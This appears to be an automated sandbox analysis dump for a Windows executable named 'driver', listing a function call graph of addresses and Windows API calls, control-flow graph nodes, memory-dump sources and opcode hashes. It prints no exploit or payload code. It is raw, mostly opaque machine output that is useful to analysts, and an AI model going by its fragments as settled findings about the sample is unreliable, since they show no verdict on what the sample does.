CompareStringA 36951->37310 37311 42c790 82 API calls 36951->37311 36953 4011a8 2 API calls 36952->36953 36954 42c788 36953->36954 37082 42c628 82 API calls 36954->37082 36958 42c5b8 36957->36958 36959 42c59f 36957->36959 36960 401840 LCMapStringA 36958->36960 36959->36958 37350 401300 82 API calls 36959->37350 36962 42c5c5 36960->36962 36962->36901 36964 42daa2 36963->36964 36988 42db67 36963->36988 36965 42dac9 36964->36965 36966 42daed 36964->36966 36964->36988 36968 40efd8 3 API calls 36965->36968 37352 43d3f0 WideCharToMultiByte 36966->37352 36970 42dad5 36968->36970 36969 42dae8 37353 415a9c LoadStringA LoadStringA WideCharToMultiByte 36969->37353 37351 43d3f0 WideCharToMultiByte 36970->37351 36973 42db11 36974 40efd8 3 API calls 36973->36974 36975 42db27 36974->36975 36976 42bb7c 82 API calls 36975->36976 36977 42db2d 36976->36977 37354 412ad8 WideCharToMultiByte MultiByteToWideChar 36977->37354 36979 42db47 36980 42db50 36979->36980 36981 42db6c 36979->36981 36983 40efd8 3 API calls 36980->36983 36982 40efd8 3 API calls 36981->36982 36984 42db76 36982->36984 36985 42db61 36983->36985 36986 42bb7c 82 API calls 36984->36986 36987 42bb7c 82 API calls 36985->36987 36986->36988 36987->36988 36989 42dfe4 36988->36989 36990 42dfed 36989->36990 36992 42e037 36990->36992 37369 42db84 82 API calls 36990->37369 36993 42e121 36992->36993 36994 42e078 36992->36994 37372 42e47c 82 API calls 36993->37372 36995 401150 2 API calls 36994->36995 36997 42e083 36995->36997 37355 401300 82 API calls 36997->37355 36999 42e45b 37402 42db84 82 API calls 36999->37402 37000 42e452 37401 433310 145 API calls 37000->37401 37001 42e202 37377 422e54 103 API calls 37001->37377 37002 42e2d0 37009 42e2fa 37002->37009 37010 42e2dd 37002->37010 37003 42e25b 37014 42e266 37003->37014 37015 42e277 37003->37015 37004 42e428 37361 430bcc 37004->37361 37005 42e418 37399 427950 198 API calls 37005->37399 37006 42e24f 37382 427c40 197 API calls 37006->37382 37024 42e309 37009->37024 37025 42e2ff 37009->37025 37022 42e2e3 37010->37022 37023 42e3f6 37010->37023 37026 42e2a0 37014->37026 37027 42e26b 37014->37027 37383 427950 198 API calls 37015->37383 37017 42e18d 37373 422e54 103 API calls 37017->37373 37018 42e1fd 37021 42e475 37018->37021 37032 42bb7c 82 API calls 37018->37032 37019 42e433 37400 430c28 VirtualFree VirtualFree 37019->37400 37020 42e20f 37378 4229fc 202 API calls 37020->37378 37084 42c0b0 VirtualFree VirtualFree 37021->37084 37033 42e406 37022->37033 37034 42e2ec 37022->37034 37395 427894 82 API calls 37023->37395 37388 427950 198 API calls 37024->37388 37036 42e2f5 37025->37036 37052 42e32b 37025->37052 37384 428564 203 API calls 37026->37384 37037 42e270 37027->37037 37038 42e2b8 37027->37038 37032->37021 37397 42ad1c 118 API calls 37033->37397 37034->37036 37056 42e39d 37034->37056 37398 42db84 82 API calls 37036->37398 37044 42e275 37037->37044 37045 42e2ac 37037->37045 37386 427950 198 API calls 37038->37386 37039 42e1c2 37374 4029a4 VirtualFree VirtualFree 37039->37374 37041 42e21a 37379 4029a4 VirtualFree VirtualFree 37041->37379 37042 42e3fd 37396 427268 201 API calls 37042->37396 37387 42db84 82 API calls 37044->37387 37385 428ac0 145 API calls 37045->37385 37052->37018 37389 413610 82 API calls 37052->37389 37054 42e22a 37380 430c28 VirtualFree VirtualFree 37054->37380 37056->37018 37392 413610 82 API calls 37056->37392 37058 42e1dd 37375 430c28 VirtualFree VirtualFree 37058->37375 37060 42e23a 37381 421b00 18 API calls 37060->37381 37063 42e3c8 37393 413e64 130 API calls 37063->37393 37065 42e36e 37390 413690 133 API calls 37065->37390 37066 42e1ed 37376 421b00 18 API calls 37066->37376 37071 42e3e4 37394 413644 VirtualFree VirtualFree 37071->37394 37072 42e094 37075 42e0ff 37072->37075 37356 412c48 37072->37356 37370 42e47c 82 API calls 37072->37370 37073 42e388 37391 413644 VirtualFree VirtualFree 37073->37391 37371 412c08 FindClose VirtualFree VirtualFree 37075->37371 37079 42e10f 37080 4011a8 2 API calls 37079->37080 37081 42e11f 37080->37081 37081->36999 37081->37000 37081->37001 37081->37002 37081->37003 37081->37004 37081->37005 37081->37006 37081->37017 37082->36894 37083->36894 37084->36907 37085->36909 37086->36911 37088 40ef3d 37087->37088 37089 40efbc FreeLibrary 37087->37089 37088->36919 37088->36920 37089->37088 37091 42e775 37090->37091 37092 42e79b GetModuleFileNameA 37091->37092 37094 42e7d4 37091->37094 37093 42e7bc 37092->37093 37093->37094 37100 42e769 37093->37100 37120 403234 37094->37120 37096 42e806 37097 42e80a 37096->37097 37114 42e81f 37096->37114 37131 4031f0 82 API calls 37097->37131 37099 42e8d2 37101 42e8d8 37099->37101 37102 42e8ed 37099->37102 37100->36926 37132 4031f0 82 API calls 37101->37132 37104 4039b0 82 API calls 37102->37104 37106 42e907 37104->37106 37105 403a68 82 API calls 37105->37114 37108 43acd0 6 API calls 37106->37108 37107 403838 82 API calls 37107->37114 37109 42e916 37108->37109 37110 42e932 37109->37110 37111 42e91d 37109->37111 37113 403838 82 API calls 37110->37113 37133 4031f0 82 API calls 37111->37133 37118 42e94b 37113->37118 37114->37099 37114->37105 37114->37107 37115 4039b0 82 API calls 37114->37115 37115->37114 37116 42ea2b 37135 4031f0 82 API calls 37116->37135 37118->37116 37134 42aca4 82 API calls 37118->37134 37121 403255 37120->37121 37122 40c794 GetVersionExA 37121->37122 37123 40328c 37122->37123 37124 4032b1 CreateFileA 37123->37124 37126 40329a CreateFileW 37123->37126 37125 4032c8 37124->37125 37127 4032cd GetLastError 37125->37127 37128 4032d7 37125->37128 37126->37125 37127->37128 37130 403325 37128->37130 37136 40bb5c WideCharToMultiByte 37128->37136 37130->37096 37131->37100 37132->37100 37133->37100 37134->37118 37135->37100 37136->37130 37138 402120 37137->37138 37139 40211b 37137->37139 37138->36929 37139->37138 37140 402131 GetModuleFileNameA 37139->37140 37141 402128 37139->37141 37169 401fd8 37140->37169 37162 4020a8 RegOpenKeyExA 37141->37162 37144 40212f 37144->36929 37145->36929 37146->36929 37148 40f706 37147->37148 37152 40f728 37147->37152 37149 40f71a 37148->37149 37150 40f70f FindClose 37148->37150 37151 43a548 2 API calls 37149->37151 37149->37152 37150->37149 37151->37152 37152->36935 37154 40f7b2 37153->37154 37161 40f7ab 37153->37161 37155 40f7db 37154->37155 37156 40f7bb 37154->37156 37158 40f8bc 14 API calls 37155->37158 37157 40f8bc 14 API calls 37156->37157 37159 40f7cc 37157->37159 37158->37159 37160 40f798 14 API calls 37159->37160 37159->37161 37160->37161 37161->36929 37163 4020f6 37162->37163 37164 4020cf RegQueryValueExA RegCloseKey 37162->37164 37165 404404 3 API calls 37163->37165 37167 402104 37163->37167 37164->37163 37165->37167 37168 40210f 37167->37168 37170 402008 SHGetMalloc SHGetSpecialFolderLocation 37167->37170 37168->37144 37169->37144 37171 402031 SHGetPathFromIDListA 37170->37171 37178 402070 37170->37178 37174 40203e 37171->37174 37171->37178 37172 402081 GetModuleFileNameA 37180 401fd8 37172->37180 37173 402095 37173->37168 37176 404404 3 API calls 37174->37176 37174->37178 37177 402061 37176->37177 37177->37178 37179 403ef8 6 API calls 37177->37179 37178->37172 37178->37173 37179->37178 37180->37173 37182 42e5de 37181->37182 37208 42e63c 37182->37208 37185 42c0dc 37214 42c1c0 37185->37214 37188 43a57c 24 API calls 37189 42c11d 37188->37189 37190 42c12b 37189->37190 37227 401150 37189->37227 37192 43a57c 24 API calls 37190->37192 37193 42c13f 37192->37193 37194 401150 2 API calls 37193->37194 37195 42c14d 37193->37195 37194->37195 37196 43a57c 24 API calls 37195->37196 37197 42c161 37196->37197 37198 42c16f 37197->37198 37199 401150 2 API calls 37197->37199 37200 43a57c 24 API calls 37198->37200 37199->37198 37201 42c183 37200->37201 37202 42c191 37201->37202 37203 401150 2 API calls 37201->37203 37204 43a57c 24 API calls 37202->37204 37203->37202 37205 42c1a5 37204->37205 37206 42c0a9 37205->37206 37207 401150 2 API calls 37205->37207 37206->36941 37207->37206 37209 42e64c 37208->37209 37212 41adf8 GetCurrentProcess GetProcessAffinityMask 37209->37212 37213 41ae14 37212->37213 37213->37185 37231 4011a8 37214->37231 37217 4011a8 2 API calls 37218 42c1e3 37217->37218 37219 4011a8 2 API calls 37218->37219 37220 42c1f3 37219->37220 37221 4011a8 2 API calls 37220->37221 37222 42c203 37221->37222 37223 4011a8 2 API calls 37222->37223 37224 42c213 37223->37224 37241 42c240 37224->37241 37228 40115a 37227->37228 37248 401270 37228->37248 37232 4011b2 37231->37232 37240 4011e6 37231->37240 37245 4011ec VirtualFree VirtualFree 37232->37245 37234 4011bf 37246 401218 VirtualFree VirtualFree 37234->37246 37236 4011cc 37247 401244 VirtualFree VirtualFree 37236->37247 37238 4011d8 37239 43a548 2 API calls 37238->37239 37238->37240 37239->37240 37240->37217 37242 42c0e7 37241->37242 37243 42c248 37241->37243 37242->37188 37244 43ace0 2 API calls 37243->37244 37244->37242 37245->37234 37246->37236 37247->37238 37249 40127a 37248->37249 37256 4012a0 37249->37256 37257 401281 37256->37257 37258 4012a8 37256->37258 37260 4012c0 37257->37260 37259 43ace0 2 API calls 37258->37259 37259->37257 37261 4012c8 37260->37261 37263 401289 37260->37263 37262 43ace0 2 API calls 37261->37262 37262->37263 37264 4012e0 37263->37264 37265 401171 37264->37265 37266 4012e8 37264->37266 37265->37190 37267 43ace0 2 API calls 37266->37267 37267->37265 37268->36945 37270 40fcd9 37269->37270 37270->37270 37272 40fd00 37270->37272 37312 40214c 37270->37312 37273 40fd8c 37272->37273 37274 40fd41 37272->37274 37275 40fd2c 37272->37275 37325 403e58 86 API calls 37273->37325 37277 403234 5 API calls 37274->37277 37317 403388 37275->37317 37278 40fd3f 37277->37278 37278->37273 37280 40fd5c 37278->37280 37281 40fd71 37280->37281 37323 433c90 82 API calls 37280->37323 37324 4031f0 82 API calls 37281->37324 37282 403838 82 API calls 37285 40fdae 37282->37285 37285->37282 37289 40fddd 37285->37289 37326 401398 82 API calls 37285->37326 37286 40fd84 37286->36951 37288 40fe17 37327 40771c 86 API calls 37288->37327 37289->37288 37297 410045 37289->37297 37291 410040 37332 401244 VirtualFree VirtualFree 37291->37332 37293 41017c 37333 4031f0 82 API calls 37293->37333 37294 40fe30 37296 410020 37294->37296 37306 40ff65 ExpandEnvironmentStringsA 37294->37306 37307 40c794 GetVersionExA 37294->37307 37308 40ff9b ExpandEnvironmentStringsW 37294->37308 37309 401308 82 API calls 37294->37309 37328 401398 82 API calls 37294->37328 37329 40bb5c WideCharToMultiByte 37294->37329 37330 401244 VirtualFree VirtualFree 37296->37330 37297->37291 37298 4100ea OemToCharA 37297->37298 37301 410102 ExpandEnvironmentStringsA 37297->37301 37303 401300 82 API calls 37297->37303 37298->37297 37300 410030 37331 401218 VirtualFree VirtualFree 37300->37331 37301->37297 37303->37297 37306->37294 37307->37294 37308->37294 37309->37294 37310->36951 37311->36951 37316 402161 37312->37316 37313 402114 16 API calls 37313->37316 37314 402193 37314->37272 37316->37313 37316->37314 37334 404444 37316->37334 37318 403234 5 API calls 37317->37318 37319 403396 37318->37319 37320 40339a 37319->37320 37349 433b28 82 API calls 37319->37349 37320->37278 37322 4033aa 37322->37278 37323->37281 37324->37286 37325->37285 37326->37285 37327->37294 37328->37294 37329->37294 37330->37300 37331->37291 37332->37293 37333->37286 37335 404463 37334->37335 37336 4044d4 37335->37336 37337 404467 37335->37337 37338 404404 3 API calls 37336->37338 37347 40f72c MultiByteToWideChar 37337->37347 37339 4044d1 37338->37339 37339->37316 37341 40447f 37348 40f764 WideCharToMultiByte 37341->37348 37343 40448c 37344 40f798 14 API calls 37343->37344 37345 4044c0 37344->37345 37346 40f6fc 3 API calls 37345->37346 37346->37339 37347->37341 37348->37343 37349->37322 37350->36958 37351->36969 37352->36969 37353->36973 37354->36979 37355->37072 37357 412c58 37356->37357 37358 412c5f 37356->37358 37357->37072 37358->37357 37359 412cd8 MultiByteToWideChar LCMapStringA 37358->37359 37403 412ed0 37358->37403 37359->37358 37362 430bd7 37361->37362 37363 43a57c 24 API calls 37362->37363 37364 430bf8 37363->37364 37366 430c09 37364->37366 37464 437994 24 API calls 37364->37464 37456 437ad8 37366->37456 37368 430c20 37368->37019 37369->36992 37370->37072 37371->37079 37372->37081 37373->37039 37374->37058 37375->37066 37376->37018 37377->37020 37378->37041 37379->37054 37380->37060 37381->37018 37382->37018 37383->37018 37384->37018 37385->37018 37386->37018 37387->37018 37388->37018 37389->37065 37390->37073 37391->37018 37392->37063 37393->37071 37394->37018 37395->37042 37396->37018 37397->37018 37398->37018 37399->37018 37400->37018 37401->37018 37402->37018 37407 412ed9 37403->37407 37404 413082 37405 40f798 14 API calls 37404->37405 37426 413405 37404->37426 37406 41310a 37405->37406 37413 413112 37406->37413 37406->37426 37407->37404 37408 40f858 15 API calls 37407->37408 37410 412ef9 37407->37410 37418 412f4b 37407->37418 37408->37418 37410->37358 37411 41315d 37412 413180 37411->37412 37415 40efd8 3 API calls 37411->37415 37416 40f6fc 3 API calls 37412->37416 37413->37411 37449 42dc8c 6 API calls 37413->37449 37417 413178 37415->37417 37444 4131a6 37416->37444 37450 42bafc 82 API calls 37417->37450 37420 412fc6 37418->37420 37421 413084 37418->37421 37422 43a57c 24 API calls 37420->37422 37421->37404 37423 41308f 37421->37423 37434 412fd0 37422->37434 37424 4130ab 37423->37424 37447 42dc8c 6 API calls 37423->37447 37424->37410 37448 433b34 82 API calls 37424->37448 37425 4134b3 37451 42bafc 82 API calls 37425->37451 37426->37410 37426->37425 37437 4134f1 37426->37437 37443 41354f 37426->37443 37430 4134cf 37431 40efd8 3 API calls 37430->37431 37433 4134dc 37431->37433 37452 42bafc 82 API calls 37433->37452 37445 40f72c MultiByteToWideChar 37434->37445 37436 40f858 15 API calls 37436->37410 37439 413538 37437->37439 37453 40bb80 MultiByteToWideChar 37437->37453 37439->37443 37454 40bb80 MultiByteToWideChar 37439->37454 37441 413034 37441->37404 37446 40f764 WideCharToMultiByte 37441->37446 37443->37410 37455 40f3a0 CompareStringA CompareStringA CharUpperA CharUpperA 37443->37455 37444->37410 37444->37436 37445->37441 37446->37404 37447->37424 37448->37410 37449->37411 37450->37412 37451->37430 37452->37410 37453->37439 37454->37443 37455->37410 37457 437b01 37456->37457 37458 437ae0 37456->37458 37461 43966c 2 API calls 37457->37461 37459 43a71c 24 API calls 37458->37459 37460 437aea 37459->37460 37460->37457 37465 433950 82 API calls 37460->37465 37463 437b19 37461->37463 37463->37368 37464->37366 37465->37457

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0040F8BC Relevance: 12.2, APIs: 8, Instructions: 245fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,00451DB0,?,?), ref: 0040F923
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00451DB0,?,?), ref: 0040F92F
                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,00451DB0,?,?), ref: 0040F95C
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00451DB0,?,?), ref: 0040F968
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00451DB0,?,?), ref: 0040FAFA
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00451DB0,?,?), ref: 0040FB06
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?,00451DB0,?,?), ref: 0040FB2E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00451DB0,?,?), ref: 0040FB3A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileFindLast$FirstNext$Version
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2293429440-0
                                                                                                                                                                    • Opcode ID: 723fbbdd2751e6d34a4293f44afff11feffcc900468bc5a3482cd193fd1769e9
                                                                                                                                                                    • Instruction ID: 52b7611e5ec98cd4e8f847a60386fd5f7313fa56db6dc6f272e3264e43f81109
                                                                                                                                                                    • Opcode Fuzzy Hash: 723fbbdd2751e6d34a4293f44afff11feffcc900468bc5a3482cd193fd1769e9
                                                                                                                                                                    • Instruction Fuzzy Hash: DAA176719002049BDB20DF25CCC1BD973B5BF84314F0886BADD5CAB68ADB785E898F65
                                                                                                                                                                    Function 00431792 Relevance: 7.5, Strings: 5, Instructions: 1218COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: $ %s$$$%s%s $0
                                                                                                                                                                    • API String ID: 0-4211349871
                                                                                                                                                                    • Opcode ID: 39237ddf5a2cb71dcf7381a4065181bc16901d63cad5d0c4144b47af8012f51f
                                                                                                                                                                    • Instruction ID: 409af18ab34a003e98142bf4d73f64a6336792d0cc8b563a1e01a480292ea48f
                                                                                                                                                                    • Opcode Fuzzy Hash: 39237ddf5a2cb71dcf7381a4065181bc16901d63cad5d0c4144b47af8012f51f
                                                                                                                                                                    • Instruction Fuzzy Hash: E4B28C709046445ADF25DB30C8847EFBBA1AF0D309F0854BFD84966293D7BC6A89CB6D
                                                                                                                                                                    Function 0040FCD0 Relevance: 6.4, APIs: 4, Instructions: 374COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 872 40fcd0-40fcd4 873 40fcd9-40fce1 872->873 873->873 874 40fce3-40fcf1 873->874 875 40fd02-40fd0f call 43bca0 874->875 876 40fcf3-40fcfb call 40214c 874->876 881 40fd12-40fd24 call 4031a0 875->881 879 40fd00 876->879 879->881 884 40fd26-40fd2a 881->884 885 40fd8c-40fd97 call 403cb8 881->885 887 40fd41-40fd53 call 403234 884->887 888 40fd2c-40fd3a call 403388 884->888 891 40fd9c-40fdae call 403e58 885->891 893 40fd58-40fd5a 887->893 892 40fd3f 888->892 897 40fdbf-40fddb call 403838 891->897 892->893 893->891 895 40fd5c-40fd60 893->895 898 40fd71-40fd85 call 4031f0 895->898 899 40fd62-40fd6c call 433c90 895->899 905 40fdb0-40fdba call 401398 897->905 906 40fddd-40fdf6 call 43bb20 897->906 907 41018d-410193 898->907 899->898 905->897 911 40fe17-40fe1f 906->911 912 40fdf8-40fdfc 906->912 915 40fe21 911->915 916 40fe24-40fe35 call 40771c 911->916 913 40fe02-40fe11 call 40fc94 912->913 914 410045-41004b 912->914 913->911 913->914 917 410160-410163 914->917 915->916 924 40fe6a-40fe73 916->924 921 410050-410054 917->921 922 410169-41018c call 401244 call 4031f0 917->922 925 410075-41007c 921->925 922->907 927 40fe75-40fe86 call 401178 924->927 928 40fe37-40fe58 924->928 929 41008c-410091 925->929 930 41007e-410085 925->930 948 410016-41001a 927->948 932 40fe5a 928->932 933 40fe5d-40fe67 928->933 936 410093 929->936 937 410095-410098 929->937 930->929 935 410087-41008a 930->935 932->933 933->924 935->929 940 410056-41005a 935->940 936->937 941 4100b4-4100b7 937->941 942 41009a-4100a1 937->942 946 410074 940->946 947 41005c-410063 940->947 944 410148-41014b 941->944 945 4100bd-4100c1 941->945 949 4100a3-4100aa 942->949 950 4100ac-4100b2 942->950 954 41014e-410155 944->954 951 4100c3-4100ca 945->951 952 4100e4-4100e8 945->952 946->925 947->946 953 410065-41006d 947->953 955 410020-410040 call 401244 call 401218 948->955 956 40fe8b-40fe8f 948->956 949->941 949->950 950->941 950->942 951->952 957 4100cc-4100dc call 43bcd0 951->957 959 4100f1-4100f7 952->959 960 4100ea-4100ec OemToCharA 952->960 953->946 958 41006f-410072 953->958 961 410157-41015e 954->961 962 41014d 954->962 955->922 963 40feae-40feb2 956->963 957->952 982 4100de-4100e3 957->982 958->946 966 4100f9-410100 959->966 967 41013a-41013c 959->967 960->959 961->917 961->962 962->954 969 40fec0-40fec7 963->969 970 40feb4-40feb8 963->970 966->967 976 410102-410116 ExpandEnvironmentStringsA 966->976 967->944 974 41013e-410143 call 401300 967->974 972 40fec9 969->972 973 40fecb-40fed0 969->973 970->969 971 40feba-40febe 970->971 971->969 978 40fe91-40fe95 971->978 972->973 979 40fed2-40fed6 973->979 980 40feea-40feee 973->980 974->944 983 410118-41011d 976->983 984 41011f-410121 976->984 990 40fe97-40fe9b 978->990 991 40feab 978->991 986 40fed8-40fedc 979->986 987 40fede-40fee8 979->987 988 410002-410005 980->988 989 40fef4-40ff0b call 40bd6c 980->989 982->952 983->984 992 410123 983->992 993 410128-41012a 984->993 986->980 986->987 987->979 987->980 995 41000a-41000e 988->995 1003 40ff0d-40ff19 call 401398 989->1003 1004 40ff1e-40ff22 989->1004 990->991 997 40fe9d-40fea2 990->997 991->963 992->993 993->967 994 41012c-410135 call 401300 993->994 994->967 999 410010-410014 995->999 1000 410007 995->1000 997->991 1002 40fea4-40fea9 997->1002 999->948 999->1000 1000->995 1002->991 1003->1004 1006 40ff24-40ff28 1004->1006 1007 40ff3c-40ff55 call 40bb5c 1004->1007 1006->1007 1009 40ff2a-40ff30 1006->1009 1012 40ff5b-40ff5f 1007->1012 1013 40ffee-40fff0 1007->1013 1009->1007 1010 40ff32-40ff39 1009->1010 1010->1007 1012->1013 1015 40ff65-40ff90 ExpandEnvironmentStringsA 1012->1015 1013->988 1014 40fff2-40fffd call 401308 1013->1014 1014->988 1017 40ffb0-40ffb2 1015->1017 1018 40ff92-40ff99 call 40c794 1015->1018 1020 40ffb4-40ffba 1017->1020 1021 40ffcb-40ffcd 1017->1021 1018->1017 1026 40ff9b-40ffad ExpandEnvironmentStringsW 1018->1026 1020->1021 1023 40ffbc-40ffc0 1020->1023 1024 40ffd4-40ffd8 1021->1024 1023->1021 1027 40ffc2-40ffc9 1023->1027 1024->1013 1025 40ffda-40ffe9 call 401308 1024->1025 1025->1013 1026->1017 1027->1021 1029 40ffcf 1027->1029 1029->1024
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                                    • Opcode ID: a5f9371a0d0590c27636a78df57696108ff67bd0894c89672ee6c046a9a1075d
                                                                                                                                                                    • Instruction ID: d369e8df352a09d4515bd656809e2040cf191b4aed85b8f09b66e00501f64b7f
                                                                                                                                                                    • Opcode Fuzzy Hash: a5f9371a0d0590c27636a78df57696108ff67bd0894c89672ee6c046a9a1075d
                                                                                                                                                                    • Instruction Fuzzy Hash: 56D1F630A0025586EB31DA24C8857EBB7B5AF45304F1480BBD984E77D2E7BC8EC9C799
                                                                                                                                                                    Function 00409EDC Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1371 409edc-409efa call 403cbc 1374 409efc-409f19 call 40efd8 call 42bafc 1371->1374 1375 409f1e-409f33 call 403838 1371->1375 1383 40a366-40a36c 1374->1383 1380 409f35-409f37 1375->1380 1381 409f3c-409f53 call 409e88 1375->1381 1380->1383 1387 409f74-409fa1 call 403e58 call 403a68 call 403838 1381->1387 1388 409f55-409f5c 1381->1388 1407 40a057-40a05e 1387->1407 1408 409fa7-409fb2 1387->1408 1389 409f62-409f6f call 4039b0 1388->1389 1390 40a083-40a085 call 40a5c4 1388->1390 1389->1390 1396 40a08a-40a098 call 40a3f0 1390->1396 1402 40a09a-40a0bb 1396->1402 1403 40a0bd-40a0cb 1396->1403 1405 40a0f6-40a182 1402->1405 1403->1405 1406 40a0cd-40a0ed call 40efd8 call 42bafc call 42bbec 1403->1406 1414 40a184-40a1e9 call 433d10 call 40efd8 call 42bafc call 40efd8 call 42bafc 1405->1414 1415 40a1ee-40a1f5 1405->1415 1406->1405 1449 40a0ef-40a0f1 1406->1449 1412 40a060-40a071 call 401244 1407->1412 1413 40a076-40a07e call 401244 1407->1413 1410 409fb8-409fc6 call 409e88 1408->1410 1411 40a04e-40a051 1408->1411 1410->1411 1430 409fcc-409fd3 1410->1430 1411->1407 1411->1408 1412->1383 1413->1390 1414->1383 1419 40a200-40a202 1415->1419 1420 40a1f7-40a1fe 1415->1420 1427 40a209-40a216 1419->1427 1420->1419 1426 40a204 1420->1426 1426->1427 1431 40a225-40a25a call 403104 1427->1431 1432 40a218-40a21f 1427->1432 1435 40a015-40a038 call 4039b0 1430->1435 1436 409fd5-409fd7 1430->1436 1451 40a2ee-40a2f7 call 40a5c4 1431->1451 1432->1431 1437 40a32e-40a335 1432->1437 1435->1407 1457 40a03a-40a04c call 403838 1435->1457 1436->1435 1443 409fd9-409fdd 1436->1443 1440 40a340-40a35f call 43bca0 call 40bd80 1437->1440 1441 40a337-40a33e 1437->1441 1447 40a364 1440->1447 1441->1440 1441->1447 1443->1435 1450 409fdf-409fe2 1443->1450 1447->1383 1449->1383 1450->1435 1455 409fe4-409ff6 1450->1455 1464 40a2fd-40a329 call 403128 1451->1464 1465 40a25f-40a268 1451->1465 1455->1411 1461 409ff8-40a000 1455->1461 1457->1407 1461->1411 1468 40a002-40a00a 1461->1468 1464->1437 1472 40a2b5-40a2b8 1465->1472 1473 40a26a-40a288 call 43bc54 1465->1473 1468->1411 1471 40a00c-40a013 1468->1471 1471->1411 1471->1435 1472->1464 1474 40a2ba-40a2c1 1472->1474 1479 40a291-40a298 1473->1479 1480 40a28a 1473->1480 1476 40a2c3-40a2ca 1474->1476 1477 40a2de-40a2e5 1474->1477 1476->1464 1481 40a2cc-40a2d3 1476->1481 1477->1464 1482 40a29a-40a2a1 1479->1482 1483 40a2ac-40a2b3 1479->1483 1480->1479 1481->1464 1484 40a2d5-40a2dc 1481->1484 1485 40a2a3-40a2aa 1482->1485 1486 40a2e7-40a2e9 call 40a3f0 1482->1486 1483->1486 1484->1464 1484->1477 1485->1483 1485->1486 1486->1451
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
